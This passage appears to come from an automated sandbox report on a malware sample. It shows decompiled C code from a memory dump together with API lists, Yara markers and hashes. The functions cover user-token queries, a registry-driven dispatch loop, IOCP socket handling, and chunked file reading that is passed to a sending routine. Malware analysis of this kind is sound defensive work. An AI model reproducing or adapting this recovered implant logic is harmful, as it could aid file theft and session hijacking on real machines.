									 *((intOrPtr*)(_t27 + 0x1c)) = _t22;
									if(_t22 != 0) {
										E04EDDAD0(_t26, _t22, 0,  *_t26);
										 *_t27 = 1;
									}
								}
							}
						}
					}
				}
				return _t27;
			}













                                                                                    0x04eb7970
                                                                                    0x04eb7972
                                                                                    0x04eb797a
                                                                                    0x04eb797a
                                                                                    0x04eb797d
                                                                                    0x04eb7988
                                                                                    0x04eb798e
                                                                                    0x04eb7995
                                                                                    0x04eb799c
                                                                                    0x04eb79a6
                                                                                    0x04eb79aa
                                                                                    0x04eb79b2
                                                                                    0x04eb79b8
                                                                                    0x04eb79bd
                                                                                    0x04eb79c5
                                                                                    0x04eb79cb
                                                                                    0x04eb79d0
                                                                                    0x04eb79d8
                                                                                    0x04eb79de
                                                                                    0x04eb79e3
                                                                                    0x04eb79e5
                                                                                    0x04eb79f2
                                                                                    0x04eb79f4
                                                                                    0x04eb79f6
                                                                                    0x04eb79f8
                                                                                    0x04eb79fa
                                                                                    0x04eb7a02
                                                                                    0x04eb7a07
                                                                                    0x04eb7a0e
                                                                                    0x04eb7a16
                                                                                    0x04eb7a16
                                                                                    0x04eb7a07
                                                                                    0x04eb79f6
                                                                                    0x04eb79e3
                                                                                    0x04eb79d0
                                                                                    0x04eb79bd
                                                                                    0x04eb7a21

                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(ntdll.dll,00000000,?,00000000,04ECB4C6), ref: 04EB79A0
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlGetCompressionWorkSpaceSize), ref: 04EB79B2
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlCompressBuffer), ref: 04EB79C5
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlDecompressBuffer), ref: 04EB79D8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                    • String ID: RtlCompressBuffer$RtlDecompressBuffer$RtlGetCompressionWorkSpaceSize$ntdll.dll
                                                                                    • API String ID: 2238633743-2202537490
                                                                                    • Opcode ID: 7bbe9a94a8b33e43a46bb5f82c17678fef45bf85559e0c5cdf7289b1a7e2b8fa
                                                                                    • Instruction ID: 8f3e8a859723487f2c5bb959d6853ba762d2d8abf80813fa9b55fb181160c1c0
                                                                                    • Opcode Fuzzy Hash: 7bbe9a94a8b33e43a46bb5f82c17678fef45bf85559e0c5cdf7289b1a7e2b8fa
                                                                                    • Instruction Fuzzy Hash: B31182B41007029BE7309F66DC44B53BBE8AF44705F105D29E982D2A81EB74F5088B94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC7200, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 59libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 68%
                                                                                    			E04EC7200(WCHAR* __ecx, long* __edx, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t11;
				_Unknown_base(*)()* _t12;
				void* _t13;
				WCHAR* _t16;
				intOrPtr* _t21;
				void* _t22;

				_t21 = __edx;
				_t16 = __ecx;
				_t22 = 0;
				if(E04ECA980() != 2) {
					 *_t21 = GetEnvironmentVariableW(L"USERPROFILE", _t16,  *__edx);
					_t22 =  !=  ? 1 : 0;
					goto L6;
				} else {
					_v12 = E04EC70A0(_t16, __edx, 0);
					_v8 = 0;
					_t11 = LoadLibraryA("Wtsapi32.dll");
					if(_t11 == 0) {
						L6:
						return _t22;
					} else {
						_t12 = GetProcAddress(_t11, "WTSQueryUserToken");
						if(_t12 == 0) {
							goto L6;
						} else {
							_t13 =  *_t12(_v12,  &_v8);
							if(_t13 == 0) {
								goto L6;
							} else {
								__imp__GetUserProfileDirectoryW(_v8, _t16, _t21);
								CloseHandle(_v8);
								return _t13;
							}
						}
					}
				}
			}














                                                                                    0x04ec7209
                                                                                    0x04ec720b
                                                                                    0x04ec720d
                                                                                    0x04ec7217
                                                                                    0x04ec727f
                                                                                    0x04ec7286
                                                                                    0x00000000
                                                                                    0x04ec7219
                                                                                    0x04ec7223
                                                                                    0x04ec7226
                                                                                    0x04ec7229
                                                                                    0x04ec7231
                                                                                    0x04ec728a
                                                                                    0x04ec7291
                                                                                    0x04ec7233
                                                                                    0x04ec7239
                                                                                    0x04ec7241
                                                                                    0x00000000
                                                                                    0x04ec7243
                                                                                    0x04ec724a
                                                                                    0x04ec724e
                                                                                    0x00000000
                                                                                    0x04ec7250
                                                                                    0x04ec7255
                                                                                    0x04ec7260
                                                                                    0x04ec726e
                                                                                    0x04ec726e
                                                                                    0x04ec724e
                                                                                    0x04ec7241
                                                                                    0x04ec7231

                                                                                    APIs
                                                                                      • Part of subcall function 04ECA980: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 04ECA9BE
                                                                                      • Part of subcall function 04ECA980: CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 04ECA9D1
                                                                                      • Part of subcall function 04ECA980: FreeSid.ADVAPI32(?), ref: 04ECA9DA
                                                                                    • GetEnvironmentVariableW.KERNEL32(USERPROFILE,?,00000104,?,?,?,04EB68A1), ref: 04EC7277
                                                                                      • Part of subcall function 04EC70A0: GetVersionExW.KERNEL32(00000114,?,00000104,00000000), ref: 04EC70DD
                                                                                      • Part of subcall function 04EC70A0: LoadLibraryA.KERNEL32(Wtsapi32.dll,?,00000104,00000000), ref: 04EC70F5
                                                                                    • LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,04EB68A1), ref: 04EC7229
                                                                                    • GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04EC7239
                                                                                    • GetUserProfileDirectoryW.USERENV(?,?,00000104,?,?,?,04EB68A1), ref: 04EC7255
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,04EB68A1), ref: 04EC7260
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad$AddressAllocateCheckCloseDirectoryEnvironmentFreeHandleInitializeMembershipProcProfileTokenUserVariableVersion
                                                                                    • String ID: USERPROFILE$WTSQueryUserToken$Wtsapi32.dll
                                                                                    • API String ID: 360731618-4029724716
                                                                                    • Opcode ID: 3ef1439d3209bbae159e87d184bcfe717243bfd88f30f356109d9b76e263d36b
                                                                                    • Instruction ID: f4d270bf273a35b117fe5798c5c5f412f853d43be9be6d6490343887b36e226b
                                                                                    • Opcode Fuzzy Hash: 3ef1439d3209bbae159e87d184bcfe717243bfd88f30f356109d9b76e263d36b
                                                                                    • Instruction Fuzzy Hash: DF01FE72B00206AF9B149FFA9D0596EFBBCDF84656B100169FD08D2210EB31ED119F90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECBCE0, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 41sleepsynchronizationthreadCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E04ECBCE0() {
				long _t1;
				void* _t9;
				void* _t13;
				void* _t14;

				_t9 = WaitForSingleObject;
				_t14 = Sleep;
				L1:
				_t10 = L"Dispatch";
				_t1 = E04EC94A0(_t9, L"Dispatch", _t13, _t14, _t15);
				_t15 = _t1;
				if(_t1 != 0) {
					__eflags = _t1 - 0x2fffffff;
					if(__eflags != 0) {
						_t13 = OpenThread(0x1fffff, 0, _t1);
						__eflags = _t13;
						if(__eflags != 0) {
							WaitForSingleObject(_t13, 0xffffffff);
							CloseHandle(_t13);
						}
						E04ECBC60(_t10, _t14, __eflags);
						Sleep(0x3e8);
					} else {
						Sleep(0x7d0);
						E04EB78A0(_t9, L"Dispatch", 0, _t13, _t14, __eflags);
						E04ECBC60(L"Dispatch", _t14, __eflags);
						Sleep(0x3e8);
					}
				} else {
					E04ECBC60(L"Dispatch", _t14, _t15);
					Sleep(0x3e8);
				}
				goto L1;
			}







                                                                                    0x04ecbce1
                                                                                    0x04ecbce8
                                                                                    0x04ecbcf0
                                                                                    0x04ecbcf0
                                                                                    0x04ecbcf5
                                                                                    0x04ecbcfa
                                                                                    0x04ecbcfc
                                                                                    0x04ecbd0c
                                                                                    0x04ecbd11
                                                                                    0x04ecbd42
                                                                                    0x04ecbd44
                                                                                    0x04ecbd46
                                                                                    0x04ecbd4b
                                                                                    0x04ecbd4e
                                                                                    0x04ecbd4e
                                                                                    0x04ecbd54
                                                                                    0x04ecbd5e
                                                                                    0x04ecbd13
                                                                                    0x04ecbd18
                                                                                    0x04ecbd21
                                                                                    0x04ecbd26
                                                                                    0x04ecbd30
                                                                                    0x04ecbd30
                                                                                    0x04ecbcfe
                                                                                    0x04ecbcfe
                                                                                    0x04ecbd08
                                                                                    0x04ecbd08
                                                                                    0x00000000

                                                                                    APIs
                                                                                      • Part of subcall function 04EC94A0: wsprintfW.USER32 ref: 04EC94E0
                                                                                      • Part of subcall function 04EC94A0: RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020119,?), ref: 04EC951D
                                                                                      • Part of subcall function 04EC94A0: RegQueryValueExW.ADVAPI32(?,04EFD09C,00000000,?,00000000,?), ref: 04EC954C
                                                                                      • Part of subcall function 04EC94A0: RegCloseKey.ADVAPI32(?), ref: 04EC9562
                                                                                      • Part of subcall function 04EC94A0: wsprintfW.USER32 ref: 04EC959B
                                                                                      • Part of subcall function 04EC94A0: OpenEventW.KERNEL32(001F0003,00000000,?), ref: 04EC95B2
                                                                                      • Part of subcall function 04EC94A0: CloseHandle.KERNEL32(00000000), ref: 04EC95BD
                                                                                    • Sleep.KERNEL32(000003E8), ref: 04ECBD08
                                                                                    • Sleep.KERNEL32(000007D0), ref: 04ECBD18
                                                                                    • Sleep.KERNEL32(000003E8), ref: 04ECBD30
                                                                                    • OpenThread.KERNEL32(001FFFFF,00000000,00000000), ref: 04ECBD3C
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04ECBD4B
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04ECBD4E
                                                                                    • Sleep.KERNEL32(000003E8), ref: 04ECBD5E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Sleep$CloseOpen$Handlewsprintf$EventObjectQuerySingleThreadValueWait
                                                                                    • String ID: Dispatch
                                                                                    • API String ID: 3560866944-2137261068
                                                                                    • Opcode ID: b9e3694fd6cbb1d3f94098f38e8481a1c2b78a6a0b2fad3de849791368d87de6
                                                                                    • Instruction ID: 0e0bc1405823805df9a36ea5d48d3cc16b66b5b66a77c5961e33c142ccdab872
                                                                                    • Opcode Fuzzy Hash: b9e3694fd6cbb1d3f94098f38e8481a1c2b78a6a0b2fad3de849791368d87de6
                                                                                    • Instruction Fuzzy Hash: 98F0F034A44218AAF30127766EC6F3E162E8FC5B2DF10235CAA34B61D09D5478020672
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED3000, Relevance: 13.7, APIs: 9, Instructions: 184threadnetworkCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 52%
                                                                                    			E04ED3000(void* __ebx, int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				long _v16;
				int _v20;
				struct _OVERLAPPED* _v24;
				long _v28;
				long _v32;
				signed int _v36;
				signed int _t51;
				signed int _t58;
				int _t65;
				DWORD* _t71;
				void* _t72;
				long _t73;
				signed int _t84;
				HANDLE* _t85;
				int _t86;
				signed int _t91;
				signed int _t97;
				long _t100;
				intOrPtr* _t101;
				signed int _t102;
				int _t104;
				struct _OVERLAPPED* _t106;
				signed int _t108;
				signed int _t109;
				signed int _t111;

				_t51 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t51 ^ _t109;
				_t104 = __ecx;
				_v20 = __ecx;
				_t84 =  *((intOrPtr*)(__ecx + 0x7c)) -  *((intOrPtr*)(__ecx + 0x78)) >> 2;
				_v16 = _t84;
				if(_t84 > 0) {
					_t102 = _t84;
					asm("o16 nop [eax+eax]");
					do {
						PostQueuedCompletionStatus( *(__ecx + 0x50), 0, 0, 0);
						_t102 = _t102 - 1;
					} while (_t102 != 0);
				}
				_v12 = 0;
				if(_t84 <= 0) {
					L13:
					 *((intOrPtr*)(_t104 + 0x7c)) =  *((intOrPtr*)(_t104 + 0x78));
					return E04ED572E(_v8 ^ _t109);
				} else {
					do {
						_t100 =  <  ? _t84 : 0x40;
						E04EF1480();
						_t91 = 0;
						_t85 = _t111;
						if(0x40 > 0) {
							_t97 = _v12 << 2;
							do {
								_t97 = _t97 + 4;
								_t85[_t91] =  *(_t97 +  *((intOrPtr*)(_t104 + 0x78)) - 4);
								_t91 = _t91 + 1;
							} while (_t91 < 0x40);
						}
						if(WaitForMultipleObjects(_t100, _t85, 1, 0xffffffff) != 0) {
							E04EB7AB0();
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_t110 = _t111;
							_t58 =  *0x4f03008; // 0x3d21fb31
							_v36 = _t58 ^ _t111;
							_t101 = _v24;
							 *((intOrPtr*)( *_t101 + 0x128))(GetCurrentThreadId(), _t100, _t104, _t85, _t109, 0x80004005);
							while(1) {
								_t86 = 0;
								_t65 = GetQueuedCompletionStatus( *(_t101 + 0x50),  &_v16,  &_v28,  &_v24, 0xffffffff);
								_t106 = _v24;
								_v20 = _t65;
								if(_t106 != 0) {
									goto L20;
								}
								L17:
								_t72 = E04ED31E0(0, _t101, _t101, _v16, _v28);
								if(_t72 == 1) {
									while(1) {
										_t86 = 0;
										_t65 = GetQueuedCompletionStatus( *(_t101 + 0x50),  &_v16,  &_v28,  &_v24, 0xffffffff);
										_t106 = _v24;
										_v20 = _t65;
										if(_t106 != 0) {
											goto L20;
										}
										goto L17;
									}
									goto L20;
								}
								if(_t72 != 2) {
									_t106 = _v24;
									_t65 = _v20;
									goto L20;
								}
								_t73 = GetCurrentThreadId();
								 *((intOrPtr*)( *_t101 + 0x12c))();
								return E04ED572E(_v12 ^ _t110, _t73);
								goto L27;
								L20:
								if(_t65 == 0) {
									_v20 = _t86;
									_v32 = GetLastError();
									if( *((intOrPtr*)( *_t101 + 0x2c))() == 0) {
										_t86 = _v32;
									} else {
										_t71 =  &_v16;
										__imp__WSAGetOverlappedResult( *((intOrPtr*)(_t106 + 0x34)), _t106, _t71, 0,  &_v20);
										if(_t71 == 0) {
											__imp__#111();
											_t86 = _t71;
										}
									}
								}
								E04ED32C0(_t101, _t101, _v28, _t106, _v16, _t86);
							}
						} else {
							_t108 = 0;
							if(_t100 > 0) {
								do {
									CloseHandle(_t85[_t108]);
									_t108 = _t108 + 1;
								} while (_t108 < _t100);
							}
							goto L12;
						}
						goto L27;
						L12:
						_v12 = _v12 + _t100;
						_t84 = _v16 - _t100;
						_t104 = _v20;
						_v16 = _t84;
					} while (_t84 > 0);
					goto L13;
				}
				L27:
			}






























                                                                                    0x04ed3006
                                                                                    0x04ed300d
                                                                                    0x04ed3012
                                                                                    0x04ed3015
                                                                                    0x04ed301e
                                                                                    0x04ed3021
                                                                                    0x04ed3026
                                                                                    0x04ed3028
                                                                                    0x04ed302a
                                                                                    0x04ed3030
                                                                                    0x04ed3039
                                                                                    0x04ed303f
                                                                                    0x04ed303f
                                                                                    0x04ed3030
                                                                                    0x04ed3044
                                                                                    0x04ed304d
                                                                                    0x04ed30c0
                                                                                    0x04ed30c3
                                                                                    0x04ed30d9
                                                                                    0x04ed3050
                                                                                    0x04ed3050
                                                                                    0x04ed3057
                                                                                    0x04ed3061
                                                                                    0x04ed3066
                                                                                    0x04ed3068
                                                                                    0x04ed306c
                                                                                    0x04ed3071
                                                                                    0x04ed3074
                                                                                    0x04ed3077
                                                                                    0x04ed307e
                                                                                    0x04ed3081
                                                                                    0x04ed3082
                                                                                    0x04ed3074
                                                                                    0x04ed3094
                                                                                    0x04ed30df
                                                                                    0x04ed30e4
                                                                                    0x04ed30e5
                                                                                    0x04ed30e6
                                                                                    0x04ed30e7
                                                                                    0x04ed30e8
                                                                                    0x04ed30e9
                                                                                    0x04ed30ea
                                                                                    0x04ed30eb
                                                                                    0x04ed30ec
                                                                                    0x04ed30ed
                                                                                    0x04ed30ee
                                                                                    0x04ed30ef
                                                                                    0x04ed30f1
                                                                                    0x04ed30f6
                                                                                    0x04ed30fd
                                                                                    0x04ed3103
                                                                                    0x04ed3111
                                                                                    0x04ed3117
                                                                                    0x04ed311c
                                                                                    0x04ed312a
                                                                                    0x04ed3130
                                                                                    0x04ed3133
                                                                                    0x04ed3138
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ed313a
                                                                                    0x04ed3143
                                                                                    0x04ed314b
                                                                                    0x04ed3117
                                                                                    0x04ed311c
                                                                                    0x04ed312a
                                                                                    0x04ed3130
                                                                                    0x04ed3133
                                                                                    0x04ed3138
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ed3138
                                                                                    0x00000000
                                                                                    0x04ed3117
                                                                                    0x04ed3150
                                                                                    0x04ed3152
                                                                                    0x04ed3155
                                                                                    0x00000000
                                                                                    0x04ed3155
                                                                                    0x04ed31af
                                                                                    0x04ed31b8
                                                                                    0x04ed31d0
                                                                                    0x00000000
                                                                                    0x04ed3158
                                                                                    0x04ed315a
                                                                                    0x04ed315c
                                                                                    0x04ed3165
                                                                                    0x04ed3171
                                                                                    0x04ed3195
                                                                                    0x04ed3173
                                                                                    0x04ed3179
                                                                                    0x04ed3181
                                                                                    0x04ed3189
                                                                                    0x04ed318b
                                                                                    0x04ed3191
                                                                                    0x04ed3191
                                                                                    0x04ed3189
                                                                                    0x04ed3171
                                                                                    0x04ed31a3
                                                                                    0x04ed31a3
                                                                                    0x04ed3096
                                                                                    0x04ed3096
                                                                                    0x04ed309a
                                                                                    0x04ed30a0
                                                                                    0x04ed30a3
                                                                                    0x04ed30a9
                                                                                    0x04ed30aa
                                                                                    0x04ed30a0
                                                                                    0x00000000
                                                                                    0x04ed309a
                                                                                    0x00000000
                                                                                    0x04ed30ae
                                                                                    0x04ed30b1
                                                                                    0x04ed30b4
                                                                                    0x04ed30b6
                                                                                    0x04ed30b9
                                                                                    0x04ed30bc
                                                                                    0x00000000
                                                                                    0x04ed3050
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000), ref: 04ED3039
                                                                                    • WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF), ref: 04ED308C
                                                                                    • CloseHandle.KERNEL32(?,?,00000001,000000FF), ref: 04ED30A3
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04ED3108
                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 04ED312A
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 04ED315F
                                                                                    • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 04ED3181
                                                                                    • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,00000000), ref: 04ED318B
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04ED31AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CompletionCurrentErrorLastQueuedStatusThread$CloseHandleMultipleObjectsOverlappedPostResultWait
                                                                                    • String ID:
                                                                                    • API String ID: 1776276126-0
                                                                                    • Opcode ID: 688b83fdd94ad86ba597118d81773c26e6afefa73a94f9a629b45cff37d83ee6
                                                                                    • Instruction ID: 30de567a0b8bf8dea4b4e00b0c0cfec770a558df084f057365e6bd02d8187835
                                                                                    • Opcode Fuzzy Hash: 688b83fdd94ad86ba597118d81773c26e6afefa73a94f9a629b45cff37d83ee6
                                                                                    • Instruction Fuzzy Hash: AA51A275A00209AFDB109FA9C884ABEFBB9FF88315F104669EE15A7250DB31AD01CB51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB50B0, Relevance: 13.6, APIs: 9, Instructions: 134filememoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 73%
                                                                                    			E04EB50B0(void* __ecx, LONG* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				struct _OVERLAPPED* _v20;
				long _v24;
				struct _OVERLAPPED* _v32;
				WCHAR* _t38;
				void* _t39;
				signed int _t41;
				signed int _t44;
				long _t45;
				long _t46;
				void* _t48;
				long _t55;
				signed int _t59;
				void* _t64;
				LONG* _t69;
				void* _t73;
				LONG* _t74;
				long _t76;
				void* _t77;

				_t65 = __ecx;
				_t74 = _a4;
				_t73 = __ecx;
				_v20 = 0;
				if( *((intOrPtr*)(_t74 + 4)) == 0xffffffff) {
					L12:
					E04EB5220(_t65);
					__eflags = 0;
					return 0;
				} else {
					_t38 = __ecx + 0x18;
					if( *((intOrPtr*)(__ecx + 0x2c)) >= 8) {
						_t38 =  *_t38;
					}
					_t39 = CreateFileW(_t38, 0x80000000, 1, 0, 3, 0x80, 0);
					_t64 = _t39;
					if(_t64 != 0xffffffff) {
						_v12 = 0;
						_t41 = GetFileSize(_t64,  &_v12);
						_v24 =  *((intOrPtr*)(_t74 + 4));
						_v8 = 0;
						_v8 = _v8 | _t41;
						asm("sbb esi, edx");
						_t44 = _v8 -  *((intOrPtr*)(_t74 + 4)) + 9;
						__eflags = _t44;
						_v8 = _t44;
						asm("adc esi, 0x0");
						if(__eflags < 0) {
							L9:
							_t76 = _v8;
						} else {
							if(__eflags > 0) {
								L8:
								_t76 = 0x40000;
								_v32 = 0;
							} else {
								__eflags = _t44 - 0x40000;
								if(_t44 <= 0x40000) {
									goto L9;
								} else {
									goto L8;
								}
							}
						}
						_t45 = SetFilePointer(_t64, _v24, _a4, 0);
						__eflags = _t45 - 0xffffffff;
						if(_t45 != 0xffffffff) {
							_t21 = _t76 - 9; // -9
							_t46 = _t21;
							_v24 = _t46;
							__eflags = _t46;
							if(_t46 == 0) {
								goto L11;
							} else {
								_v16 = 0;
								_t48 = LocalAlloc(0x40, _t76);
								_t69 = _a4;
								_t77 = _t48;
								 *_t77 = 0x6b;
								 *(_t77 + 1) =  *_t69;
								 *(_t77 + 5) = _t69[1];
								_t30 = _t77 + 9; // 0x9
								ReadFile(_t64, _t30, _v24,  &_v16, 0);
								CloseHandle(_t64);
								_t55 = _v16;
								__eflags = _t55;
								if(_t55 == 0) {
									E04EB5220(_t73);
									LocalFree(_t77);
									return _v20;
								} else {
									_push(_t69);
									_t59 = _t55 + 9;
									__eflags = _t59;
									_push(0x4f);
									_push(_t59);
									_push(_t77);
									_v20 = E04EB1C60( *((intOrPtr*)(_t73 + 4)));
									LocalFree(_t77);
									return _v20;
								}
							}
						} else {
							L11:
							CloseHandle(_t64);
							_t65 = _t73;
							goto L12;
						}
					} else {
						return _t39;
					}
				}
			}
























                                                                                    0x04eb50b0
                                                                                    0x04eb50b8
                                                                                    0x04eb50bc
                                                                                    0x04eb50be
                                                                                    0x04eb50c9
                                                                                    0x04eb517a
                                                                                    0x04eb517a
                                                                                    0x04eb517f
                                                                                    0x04eb5187
                                                                                    0x04eb50cf
                                                                                    0x04eb50d3
                                                                                    0x04eb50d6
                                                                                    0x04eb50d8
                                                                                    0x04eb50d8
                                                                                    0x04eb50ed
                                                                                    0x04eb50f3
                                                                                    0x04eb50f8
                                                                                    0x04eb5108
                                                                                    0x04eb5111
                                                                                    0x04eb511c
                                                                                    0x04eb5127
                                                                                    0x04eb512e
                                                                                    0x04eb5136
                                                                                    0x04eb5138
                                                                                    0x04eb5138
                                                                                    0x04eb513b
                                                                                    0x04eb513e
                                                                                    0x04eb5141
                                                                                    0x04eb515a
                                                                                    0x04eb515a
                                                                                    0x04eb5143
                                                                                    0x04eb5143
                                                                                    0x04eb514c
                                                                                    0x04eb514c
                                                                                    0x04eb5151
                                                                                    0x04eb5145
                                                                                    0x04eb5145
                                                                                    0x04eb514a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb514a
                                                                                    0x04eb5143
                                                                                    0x04eb5166
                                                                                    0x04eb516c
                                                                                    0x04eb516f
                                                                                    0x04eb518a
                                                                                    0x04eb518a
                                                                                    0x04eb518d
                                                                                    0x04eb5190
                                                                                    0x04eb5192
                                                                                    0x00000000
                                                                                    0x04eb5194
                                                                                    0x04eb5197
                                                                                    0x04eb519e
                                                                                    0x04eb51a4
                                                                                    0x04eb51a7
                                                                                    0x04eb51ab
                                                                                    0x04eb51b0
                                                                                    0x04eb51b6
                                                                                    0x04eb51c0
                                                                                    0x04eb51c5
                                                                                    0x04eb51cc
                                                                                    0x04eb51d2
                                                                                    0x04eb51d5
                                                                                    0x04eb51d7
                                                                                    0x04eb5201
                                                                                    0x04eb5207
                                                                                    0x04eb5216
                                                                                    0x04eb51d9
                                                                                    0x04eb51d9
                                                                                    0x04eb51dd
                                                                                    0x04eb51dd
                                                                                    0x04eb51e0
                                                                                    0x04eb51e2
                                                                                    0x04eb51e3
                                                                                    0x04eb51ea
                                                                                    0x04eb51ed
                                                                                    0x04eb51fc
                                                                                    0x04eb51fc
                                                                                    0x04eb51d7
                                                                                    0x04eb5171
                                                                                    0x04eb5171
                                                                                    0x04eb5172
                                                                                    0x04eb5178
                                                                                    0x00000000
                                                                                    0x04eb5178
                                                                                    0x04eb50fa
                                                                                    0x04eb5102
                                                                                    0x04eb5102
                                                                                    0x04eb50f8

                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 04EB50ED
                                                                                    • GetFileSize.KERNEL32(00000000,?), ref: 04EB5111
                                                                                    • SetFilePointer.KERNEL32(00000000,?,00000000,00000000), ref: 04EB5166
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EB5172
                                                                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 04EB519E
                                                                                    • ReadFile.KERNEL32(00000000,00000009,?,00000000,00000000), ref: 04EB51C5
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EB51CC
                                                                                    • LocalFree.KERNEL32(00000000,00000000,-00000009,0000004F), ref: 04EB51ED
                                                                                    • LocalFree.KERNEL32(00000000), ref: 04EB5207
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$Local$CloseFreeHandle$AllocCreatePointerReadSize
                                                                                    • String ID:
                                                                                    • API String ID: 1193681933-0
                                                                                    • Opcode ID: d49439b0a8bd12fb5067cb1a3c25636c15bce2a17665f8a35997c08a4f6a28d3
                                                                                    • Instruction ID: 78c5d01e3297996bec81ce079d34110166a9cf719427b813d8837e3cf5567dd5
                                                                                    • Opcode Fuzzy Hash: d49439b0a8bd12fb5067cb1a3c25636c15bce2a17665f8a35997c08a4f6a28d3
                                                                                    • Instruction Fuzzy Hash: C041B475A01205BBDB10DFA4D844BAEB7B8EB48329F10466AE955E3380D735A9008B90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECE180, Relevance: 13.6, APIs: 9, Instructions: 122memorynetworkCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 80%
                                                                                    			E04ECE180(intOrPtr* __ecx) {
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _t43;
				long _t44;
				void* _t50;
				long _t52;
				void* _t53;
				void* _t63;
				intOrPtr _t66;
				intOrPtr* _t71;
				struct _CRITICAL_SECTION* _t76;
				struct _CRITICAL_SECTION* _t78;

				_push(__ecx);
				_t71 = __ecx;
				while( *((intOrPtr*)(_t71 + 0x180)) > 0) {
					_t2 = _t71 + 0x14c; // 0x14d
					_t76 = _t2;
					EnterCriticalSection(_t76);
					_t63 =  *(_t71 + 0x168);
					if(_t63 ==  *(_t71 + 0x16c)) {
						if(_t63 != 0) {
							 *(_t71 + 0x168) = 0;
							 *(_t71 + 0x16c) = 0;
							goto L6;
						}
					} else {
						_t53 =  *(_t63 + 4);
						 *(_t71 + 0x168) = _t53;
						 *(_t53 + 8) = 0;
						L6:
						if(_t63 != 0) {
							 *(_t63 + 4) = 0;
							 *(_t63 + 8) = 0;
							 *((intOrPtr*)(_t71 + 0x164)) =  *((intOrPtr*)(_t71 + 0x164)) - 1;
						}
					}
					LeaveCriticalSection(_t76);
					if(_t63 == 0) {
						break;
					} else {
						_t66 =  *((intOrPtr*)(_t63 + 0x14));
						_t43 =  *((intOrPtr*)(_t63 + 0x18)) - _t66;
						__imp__#19( *((intOrPtr*)(_t71 + 0x1c)), _t66, _t43, 0);
						_v24 = _t43;
						if(_t43 <= 0) {
							if(_t43 == 0xffffffff) {
								__imp__#111();
								if(_t43 != 0x2733) {
									_t36 = _t71 + 0x84; // 0x85
									 *((intOrPtr*)(_t71 + 0xc)) = 1;
									 *((intOrPtr*)(_t71 + 0x10)) = 3;
